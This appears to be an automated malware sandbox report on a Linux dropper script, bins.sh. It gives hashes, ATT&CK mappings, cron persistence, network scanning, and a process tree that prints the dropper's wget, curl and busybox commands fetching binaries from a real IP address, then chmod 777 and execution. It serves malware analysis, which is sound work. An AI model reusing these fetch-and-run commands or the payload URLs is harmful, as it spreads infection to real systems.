cf96cf96c66ebd8661203d14b1a005accb5a1be456552d9e407e067a16981947

Analysis

max time kernel
149s
max time network
150s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
20/11/2024, 13:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

6455d6e588df96170309a55c34f9a5fb
SHA1

285a51c3374e49307c0244a46a13fc489d56f340
SHA256

cf96cf96c66ebd8661203d14b1a005accb5a1be456552d9e407e067a16981947
SHA512

eb65d310ae1cbd98fdd88181db8f2667ca296ec34b9187118dbd0d1fb891280c433137d14b63d8876d7c6c35ef14a0eb9501cff9662900ad6bedec1fbda8f053
SSDEEP

96:wJqoEYYsFnB9q0XXYQIFxDuu5TWtDxeWusXYQIFxlWQuu5TWtDVnp0vvaR0oEuuZ:wJlYsFnBHcuuEtDMRuuEtD/CN3

Score

9^/10

defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Contacts a large (2149) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1509	chmod
1516	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls	1510	1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs	1517	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs

Renames itself 1 IoCs

pid	Process
1518	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.hpke17	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1567/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1629/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1701/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1749/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1501/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/98/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/162/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/601/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1602/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/20/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/16/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/24/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1068/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1187/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1523/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1659/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/4/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/468/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/989/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1179/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1347/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1585/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1638/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1663/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/430/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1765/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1728/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/166/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/916/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1590/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1639/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1682/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1685/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/31/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1528/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1595/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1651/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1226/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/29/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/161/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/472/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/515/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1572/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1613/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1675/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/3/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1543/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1632/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1735/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/984/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/672/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1123/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1582/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1630/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1691/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1718/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1742/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/175/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1772/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/552/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1016/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1161/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1549/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
File opened for reading	/proc/1553/cmdline	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls	wget
File opened for modification	/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls	curl
File opened for modification	/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls	busybox
File opened for modification	/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs	wget
File opened for modification	/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs	curl
File opened for modification	/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:1501
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:1502
- /usr/bin/wget
  wget http://216.126.231.240/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  - Writes file to tmp directory
  PID:1503
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  - Writes file to tmp directory
  PID:1507
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  - Writes file to tmp directory
  PID:1508
- /bin/chmod
  chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  - File and Directory Permissions Modification
  PID:1509
- /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  ./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  - Executes dropped EXE
  PID:1510
- /bin/rm
  rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  PID:1512
- /usr/bin/wget
  wget http://216.126.231.240/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  - Writes file to tmp directory
  PID:1513
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  - Writes file to tmp directory
  PID:1514
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  - Writes file to tmp directory
  PID:1515
- /bin/chmod
  chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  - File and Directory Permissions Modification
  PID:1516
- /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  ./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:1517
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:1519
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:1520
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:1521
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:1522
- /bin/rm
  rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  PID:1524
- /usr/bin/wget
  wget http://216.126.231.240/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
  2⤵
  PID:1527

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Network Service Discovery

T1046

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls

Filesize
107KB

MD5
eb9c3a0de91fcf16ba17cb24608df68c

SHA1
09d95a7d70d5e115d103be51edff7c498d272fac

SHA256
dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

SHA512
9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

Download Submit
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs

Filesize
112KB

MD5
05d7857dcead18bbd86d2935f591873c

SHA1
34d18f41ef35f93d5364ce3e24d74730a4e91985

SHA256
2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

SHA512
d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

Download Submit
/var/spool/cron/crontabs/tmp.hpke17

Filesize
210B

MD5
6a399bb1932b15e48ebb1e22adc68bcb

SHA1
86f1f91305494378ebd9bf3cd7a0b47fa472b550

SHA256
e4b6fc39e47c93db86e94ca505deb1b4f2fc0e0e0032ca4c2db5d0ffb68ce7ee

SHA512
e54694c79ccc6960d1503c48e87e37c7b637b9fd86839d1d5608b70b4d24e2fd1533746ad6dbecce14e8c5a950e7ff0d30fb027638738ee4495218be628781bc

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads